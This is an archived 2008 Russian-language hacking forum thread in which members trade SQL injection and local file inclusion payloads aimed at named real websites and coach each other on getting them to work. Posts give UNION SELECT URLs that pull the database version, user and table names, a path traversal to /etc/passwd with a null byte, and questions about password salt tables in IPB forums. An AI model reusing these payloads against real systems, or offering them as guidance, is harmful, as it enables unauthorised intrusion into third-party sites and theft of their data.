HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.08.2008, 03:19
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

редактируй index.php
 
Ответить с цитированием

  #2  
Старый 11.08.2008, 04:36
SVAROG
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059

Репутация: 206
По умолчанию

при запросе id=2'
получаю сообщение
DBI debuging message / Отладочное сообщение DBI
Error / Ошибка Could not Parse Query
Query / Запрос select id,one,name from pb_portal where id=2\'
Description / Описание You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
там как я понял фильтрация какаято, хелп
http://www.paintball.ru/next.php?id=2'
 
Ответить с цитированием

  #3  
Старый 11.08.2008, 05:29
Girsoft
Новичок
Регистрация: 23.01.2007
Сообщений: 21
Провел на форуме:
20113

Репутация: 1
По умолчанию

скажите как называется таблица с "солью" в новых версиях и где она лежит? и подскажите плиз какого вида функция шифровки пароля в ИПБ-формух?
 
Ответить с цитированием

  #4  
Старый 11.08.2008, 07:26
Girsoft
Новичок
Регистрация: 23.01.2007
Сообщений: 21
Провел на форуме:
20113

Репутация: 1
По умолчанию

И ещё подскажите. Вот ситуация:

Есть локальный инклуд. логов не нашёл. На поддомене есть форум. адресв вида:

forum.site.ru
и есть возможность туда загружать файлы. Но вот проблема: я не знаю как прописать путь до форума! Если ИП адрес их отличается - это значит что они на разных компах? (205.222.222.123 и 205.222.222.124)

site.ru/forum/ не катит =(

site.ru/ins.php?inc=../../../etc/passwd%00

кто что думает по данному поводу?
 
Ответить с цитированием

  #5  
Старый 11.08.2008, 08:02
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

Цитата:
скажите как называется таблица с "солью" в новых версиях и где она лежит? и подскажите плиз какого вида функция шифровки пароля в ИПБ-формух?
SQL Databases

Цитата:
логов не нашёл.
пробуй httpd.conf поискать...

Цитата:
не знаю как прописать путь до форума!
https://forum.antichat.ru/showthread.php?t=30632

Цитата:
сли ИП адрес их отличается - это значит что они на разных компах? (205.222.222.123 и 205.222.222.124)
не обязательно...
 
Ответить с цитированием

  #6  
Старый 11.08.2008, 08:14
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

что тут можно зделать ?
Цитата:
http://interfilm.ru/takelogin.php?returnto=&username=admin&password=99 99999+union+select+1
и вот тут
Цитата:
http://www.photodom.com/ru/catalog.php?page=0&id=9999999)+union+select+1,2,3, 4,5,6,7,9,10/*
а также здесь знаю что юнион использовать нельзя.. но все же..
Цитата:
http://www.aldebaran.ru/gb/index.php?entry=25+union+all+select+1/*
netframework - хз как разкрутить..
Цитата:
http://zman.com/news/category.aspx?CategoryId=20'
SVAROG
Цитата:
http://www.paintball.ru/next.php?id=99999+union+select+1,2,table_name+from +information_schema.tables+limit+17,1--
баян..
 
Ответить с цитированием

  #7  
Старый 11.08.2008, 10:58
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

2 sabe

http://interfilm.ru/takelogin.php
Пишет что нет коннекта с базой, что ты хочешь от него

Сдесь пятая ветка без вывода,подзапросы:
http://www.photodom.com/ru/catalog.php?page=0&id=9)+and+substring(version(),1 ,1)=5/*

Сдесь лимит после ордер влиять на запрос можно только подставляя 2-е значение лимита:
http://www.aldebaran.ru/gb/index.php?entry=25,1/*
тоесть никак

это ошибка введённых данных использовать можно только расскрытие пути
http://zman.com/news/category.aspx?CategoryId=20
 
Ответить с цитированием

  #8  
Старый 11.08.2008, 10:36
superboys
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161

Репутация: 5
По умолчанию

http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+ select+1,2,3,4,unhex(hex(concat(version(),database (),password(0),user()))),6,7,8,9/* кто знает как тут нарыть удалённый адрес для БД
 
Ответить с цитированием

  #9  
Старый 11.08.2008, 12:08
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043

Репутация: 137
По умолчанию

Цитата:
Сообщение от superboys  
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+ select+1,2,3,4,unhex(hex(concat(version(),database (),password(0),user()))),6,7,8,9/* кто знает как тут нарыть удалённый адрес для БД
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_en crypt(concat_ws(0x3a,version(),database(),user()), 0x71),0x71),6,7,8,9/*
 
Ответить с цитированием

  #10  
Старый 11.08.2008, 12:34
superboys
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161

Репутация: 5
По умолчанию

сёравно @localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ